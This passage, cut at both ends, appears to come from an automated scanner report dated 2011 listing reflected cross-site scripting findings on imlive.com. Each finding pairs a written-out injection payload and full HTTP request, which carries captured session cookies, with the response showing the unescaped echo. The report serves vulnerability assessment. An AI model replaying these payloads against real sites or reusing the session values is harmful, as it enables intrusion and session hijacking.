Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:01 GMT
Connection: close
Content-Length: 40531
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/?6d227'-alert(1)-'63744927c3a=1&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEve
...[SNIP]...

4.495. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ff1"><a>7cdd9e5718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/?66ff1"><a>7cdd9e5718=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:44 GMT
Connection: close
Content-Length: 40363
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/?66ff1"><a>7cdd9e5718=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.496. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/adult-shows/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52a1f'-alert(1)-'124e919064e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:40 GMT
Connection: close
Content-Length: 25778
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.497. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/adult-shows/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb3b0"><a>47d9b6a6eb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 25631
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.498. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d13a5'-alert(1)-'167550feeda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:10 GMT
Connection: close
Content-Length: 225335
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.499. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d76ad"><a>13636193c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.500. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 145d0'-alert(1)-'7c612653421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:19 GMT
Connection: close
Content-Length: 27791
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a
...[SNIP]...

4.501. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/cam-girls/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b83"><a>3293a7e18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:10 GMT
Connection: close
Content-Length: 27644
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.502. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/cams-aroundthehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f55"><a>53aa4db76a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:00 GMT
Connection: close
Content-Length: 33620
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.503. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/cams-aroundthehouse/

Issue detail

